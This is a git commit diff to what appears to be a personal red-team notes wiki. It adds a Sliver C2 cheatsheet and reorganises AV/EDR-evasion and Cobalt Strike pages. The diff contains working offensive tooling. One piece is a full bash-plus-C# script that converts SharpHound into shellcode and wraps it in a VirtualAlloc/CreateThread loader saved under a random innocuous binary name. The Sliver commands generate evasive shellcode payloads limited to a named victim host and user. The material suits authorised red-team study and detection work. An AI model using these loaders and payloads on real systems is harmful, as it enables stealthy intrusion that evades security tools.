[AHK] Automatic update 👽

SUMMARY.md

@@ -9,6 +9,7 @@
   - [Empire](pentest/c2/empire.md)
   - [Metasploit](pentest/c2/metasploit.md)
   - [PoshC2](pentest/c2/poshc2.md)
+  - [Sliver](pentest/c2/sliver.md)
 * [Infrastructure](pentest/infrastructure/README.md)
   - [AD](pentest/infrastructure/ad/README.md)
     * [ACL Abuse](pentest/infrastructure/ad/acl-abuse.md)

pentest/c2/sliver.md

@@ -0,0 +1,50 @@
+# Sliver
+
+- [https://github.com/BishopFox/sliver](https://github.com/BishopFox/sliver)
+
+
+
+
+## Install
+
+- [https://github.com/BishopFox/sliver/releases/latest](https://github.com/BishopFox/sliver/releases/latest)
+
+Install team server as a daemon on the team server:
+
+```
+$ curl https://sliver.sh/install | sudo bash
+```
+
+For a client get a `sliver-client` binary from releases.
+
+
+
+
+## Configure Team Server for Multiplayer
+
+- [https://github.com/BishopFox/sliver/wiki/Configuration-Files](https://github.com/BishopFox/sliver/wiki/Configuration-Files)
+
+Change [multiplayer](https://github.com/BishopFox/sliver/wiki/Multiplayer-Mode) listener host (daemon mode) and restart:
+
+```
+$ sudo vi /root/.sliver/configs/server.json
+$ sudo systemctl restart sliver.service
+```
+
+Generate config for a new operator:
+
+```
+$ sudo /root/sliver-server operator --name snovvcrash-kali-home --lhost <PRIVATE_IP> --lport 31337 --save snovvcrash_<PRIVATE_IP>.cfg
+```
+
+
+
+
+## Cheatsheet
+
+A redirector-aware pair of payload and listener (when redirecting to `PRIVATE_IP:8443`):
+
+```
+sliver > generate --os windows --arch amd64 --format shellcode [--evasion] --http example.com:443 [--limit-datetime 1970-01-01] [--limit-hostname VICTIM-PC] [--limit-username victim.user] --name victimpc --save /home/snovvcrash/www/shellcode.bin
+sliver > https --domain example.com --lhost <PRIVATE_IP> --lport 8443
+```

pentest/infrastructure/ad/av-edr-evasion/maldev/README.md

@@ -8,3 +8,12 @@
 ```
 $ msfvenom -p windows/messagebox TITLE="EICAR" TEXT="X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" -f raw -o eikar.bin
 ```
+
+
+
+
+## PE Injection
+
+- [https://gist.github.com/hasherezade/e6daa4124fab73543497b6d1295ece10](https://gist.github.com/hasherezade/e6daa4124fab73543497b6d1295ece10)
+- [https://xakep.ru/2018/08/27/doppelganging-process/](https://xakep.ru/2018/08/27/doppelganging-process/)
+- [https://xakep.ru/2022/04/21/herpaderping-and-ghosting/](https://xakep.ru/2022/04/21/herpaderping-and-ghosting/)

pentest/infrastructure/ad/av-edr-evasion/maldev/code-injection/README.md

@@ -48,7 +48,6 @@ int main (int argc, char **argv)
 
 {% embed url="https://twitter.com/_RastaMouse/status/1443923456630968320" %}
 
-- [https://blog.cobaltstrike.com/2018/09/06/cobalt-strike-3-12-blink-and-youll-miss-it/](https://blog.cobaltstrike.com/2018/09/06/cobalt-strike-3-12-blink-and-youll-miss-it/)
 - [https://www.solomonsklash.io/SleepyCrypt-shellcode-to-encrypt-a-running-image.html](https://www.solomonsklash.io/SleepyCrypt-shellcode-to-encrypt-a-running-image.html)
 - [https://github.com/SolomonSklash/SleepyCrypt](https://github.com/SolomonSklash/SleepyCrypt)
 - [https://github.com/mgeeky/ShellcodeFluctuation](https://github.com/mgeeky/ShellcodeFluctuation)
@@ -58,15 +57,6 @@ int main (int argc, char **argv)
 
 
 
-## PE Injection
-
-- [https://gist.github.com/hasherezade/e6daa4124fab73543497b6d1295ece10](https://gist.github.com/hasherezade/e6daa4124fab73543497b6d1295ece10)
-- [https://xakep.ru/2018/08/27/doppelganging-process/](https://xakep.ru/2018/08/27/doppelganging-process/)
-- [https://xakep.ru/2022/04/21/herpaderping-and-ghosting/](https://xakep.ru/2022/04/21/herpaderping-and-ghosting/)
-
-
-
-
 ## Detection
 
 - [https://www.mono-project.com/docs/tools+libraries/tools/monodis/](https://www.mono-project.com/docs/tools+libraries/tools/monodis/)
@@ -113,3 +103,63 @@ Another [method](https://twitter.com/vinopaljiri/status/1508447487048261641) wit
 * [https://github.com/0xDivyanshu/Injector](https://github.com/0xDivyanshu/Injector)
 * [https://github.com/jfmaes/SharpZipRunner](https://github.com/jfmaes/SharpZipRunner)
 * [https://github.com/plackyhacker/Shellcode-Injection-Techniques](https://github.com/plackyhacker/Shellcode-Injection-Techniques)
+
+
+
+### PE to Shellcode
+
+- [https://github.com/monoxgas/sRDI](https://github.com/monoxgas/sRDI)
+- [https://github.com/TheWover/donut](https://github.com/TheWover/donut)
+- [https://github.com/hasherezade/pe_to_shellcode](https://github.com/hasherezade/pe_to_shellcode)
+
+[Example](https://github.com/l4ckyguy/ukn0w/commit/0823f51d01790ef53aa9406f99b6a75dfff7f146) with [SharpHound.exe](https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe) and donut (C# cross-compilation is done with [Mono](https://www.mono-project.com/download/stable/)):
+
+{% code title="sweetblood.sh" %}
+```bash
+RNDNAME=`curl -sL https://github.com/penetrarnya-tm/WeaponizeKali.sh/raw/main/misc/binaries.txt | shuf -n1`
+wget https://github.com/BloodHoundAD/BloodHound/raw/master/Collectors/SharpHound.exe -qO /tmp/SharpHound.exe
+
+# --ldapusername snovvcrash --ldappassword Passw0rd!
+~/tools/PEzor/deps/donut/donut -a2 -z2 -i /tmp/SharpHound.exe -p '--CollectionMethod All,LoggedOn --NoSaveCache --OutputDirectory C:\Windows\Tasks --ZipFilename sweetbl.zip' -o /tmp/SharpHound.bin
+
+BUF=`xxd -i /tmp/SharpHound.bin | head -n-2 | tail -n+2 | tr -d ' ' | tr -d '\n'`
+BUFSIZE=`xxd -i /tmp/SharpHound.bin | tail -n1 | awk '{print $5}' | tr -d ';\n'`
+
+cat << EOF > "/tmp/$RNDNAME.cs"
+using System;
+using System.Runtime.InteropServices;
+
+namespace Sh4rpH0und
+{
+    class Program
+    {
+        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
+        static extern IntPtr VirtualAlloc(IntPtr lpAddress, ulong dwSize, uint flAllocationType, uint flProtect);
+
+        [DllImport("kernel32.dll")]
+        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+
+        [DllImport("kernel32.dll")]
+        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
+
+        static void Main(string[] args)
+        {
+            byte[] buf = new byte[$BUFSIZE] { $BUF };
+            IntPtr addr = VirtualAlloc(IntPtr.Zero, (ulong)buf.Length, 0x1000, 0x40);
+            Marshal.Copy(buf, 0, addr, buf.Length);
+            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
+            WaitForSingleObject(hThread, 0xFFFFFFFF);
+        }
+    }
+}
+EOF
+
+mcs -platform:x64 -t:winexe "/tmp/$RNDNAME.cs" -out:"$RNDNAME.exe"
+file "$RNDNAME.exe"
+rm "/tmp/SharpHound.exe" "/tmp/SharpHound.bin" "/tmp/$RNDNAME.cs"
+```
+{% endcode %}
+
+{% hint style="info" %}
+This technique is enhanced and automated [here](https://gist.github.com/snovvcrash/30bd25b1a5a18d8bb7ce3bb8dc2bae37).
+{% endhint %}

pentest/infrastructure/ad/kerberos/README.md

@@ -35,6 +35,8 @@ $ faketime '1970-01-01 00:00:00' /bin/date
 
 ## Kerberos on Linux
 
+- [https://medium.com/@n0pe_sled](https://medium.com/@n0pe_sled)
+
 ```
 $ env | grep KRB5
 ```

redteam/cobalt-strike.md

@@ -9,27 +9,14 @@
 ## Malleable C2 Profiles
 
 - [https://blog.zsec.uk/cobalt-strike-profiles/](https://blog.zsec.uk/cobalt-strike-profiles/)
-
 - [https://github.com/rsmudge/Malleable-C2-Profiles](https://github.com/rsmudge/Malleable-C2-Profiles)
-- [https://github.com/BC-SECURITY/Malleable-C2-Profiles](https://github.com/BC-SECURITY/Malleable-C2-Profiles)
-- [https://github.com/threatexpress/malleable-c2](https://github.com/threatexpress/malleable-c2)
-- [https://gist.github.com/tothi/8abd2de8f4948af57aa2d027f9e59efe](https://gist.github.com/tothi/8abd2de8f4948af57aa2d027f9e59efe)
-- [https://github.com/HuskyHacks/CobaltNotion](https://github.com/HuskyHacks/CobaltNotion)
-
-
-
-### Generators
-
-- [https://github.com/Tylous/SourcePoint](https://github.com/Tylous/SourcePoint)
-- [https://github.com/FortyNorthSecurity/C2concealer](https://github.com/FortyNorthSecurity/C2concealer)
-- [https://github.com/threatexpress/random_c2_profile](https://github.com/threatexpress/random_c2_profile)
 
 
 
 
 ## Aggressor Scripts
 
-- [https://trial.cobaltstrike.com/aggressor-script/index.html](https://trial.cobaltstrike.com/aggressor-script/index.html)
+- [https://trial.cobaltstrike.com/aggressor-script/functions.html](https://trial.cobaltstrike.com/aggressor-script/functions.html)
 - [https://chowdera.com/2021/02/20210204190220156W.html](https://chowdera.com/2021/02/20210204190220156W.html)
 
 
@@ -207,54 +194,18 @@ beacon> mimikatz dpapi::cred /in:C:\Users\snovvcrash\AppData\Local\Microsoft\Cre
 
 
 
-## BloodHound
+## Evasion
 
-* [https://github.com/l4ckyguy/ukn0w/commit/0823f51d01790ef53aa9406f99b6a75dfff7f146](https://github.com/l4ckyguy/ukn0w/commit/0823f51d01790ef53aa9406f99b6a75dfff7f146)
 
-Grab the latest version of [SharpHound.exe](https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe), convert it to a shellcode with [donut](https://github.com/TheWover/donut), insert bytes in a C# skeleton and cross-compile it for use in Windows with [Mono](https://www.mono-project.com/download/stable/) compiler:
 
-{% code title="sweetblood.sh" %}
-```bash
-RNDNAME=`curl -sL https://github.com/penetrarnya-tm/WeaponizeKali.sh/raw/main/misc/binaries.txt | shuf -n1`
-wget https://github.com/BloodHoundAD/BloodHound/raw/master/Collectors/SharpHound.exe -qO /tmp/SharpHound.exe
+### Sleep Mask
 
-# --ldapusername snovvcrash --ldappassword Passw0rd!
-~/tools/PEzor/deps/donut/donut -a2 -z2 -i /tmp/SharpHound.exe -p '--CollectionMethod All,LoggedOn --NoSaveCache --OutputDirectory C:\Windows\Tasks --ZipFilename sweetbl.zip' -o /tmp/SharpHound.bin
+{% hint style="info" %}
+Take a look at Shellcode In-Memory Fluctuation technique.
+{% endhint %}
 
-BUF=`xxd -i /tmp/SharpHound.bin | head -n-2 | tail -n+2 | tr -d ' ' | tr -d '\n'`
-BUFSIZE=`xxd -i /tmp/SharpHound.bin | tail -n1 | awk '{print $5}' | tr -d ';\n'`
+{% content-ref url="/pentest/infrastructure/ad/av-edr-evasion/maldev/code-injection/README.md#shellcode-in-memory-fluctuation" %}
+[ntlmv1-downgrade.md](ntlmv1-downgrade.md)
+{% endcontent-ref %}
 
-cat << EOF > "/tmp/$RNDNAME.cs"
-using System;
-using System.Runtime.InteropServices;
-
-namespace Sh4rpH0und
-{
-    class Program
-    {
-        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
-        static extern IntPtr VirtualAlloc(IntPtr lpAddress, ulong dwSize, uint flAllocationType, uint flProtect);
-
-        [DllImport("kernel32.dll")]
-        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
-
-        [DllImport("kernel32.dll")]
-        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
-
-        static void Main(string[] args)
-        {
-            byte[] buf = new byte[$BUFSIZE] { $BUF };
-            IntPtr addr = VirtualAlloc(IntPtr.Zero, (ulong)buf.Length, 0x1000, 0x40);
-            Marshal.Copy(buf, 0, addr, buf.Length);
-            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
-            WaitForSingleObject(hThread, 0xFFFFFFFF);
-        }
-    }
-}
-EOF
-
-mcs -platform:x64 -t:winexe "/tmp/$RNDNAME.cs" -out:"$RNDNAME.exe"
-file "$RNDNAME.exe"
-rm "/tmp/SharpHound.exe" "/tmp/SharpHound.bin" "/tmp/$RNDNAME.cs"
-```
-{% endcode %}
+- [https://adamsvoboda.net/sleeping-with-a-mask-on-cobaltstrike/](https://adamsvoboda.net/sleeping-with-a-mask-on-cobaltstrike/)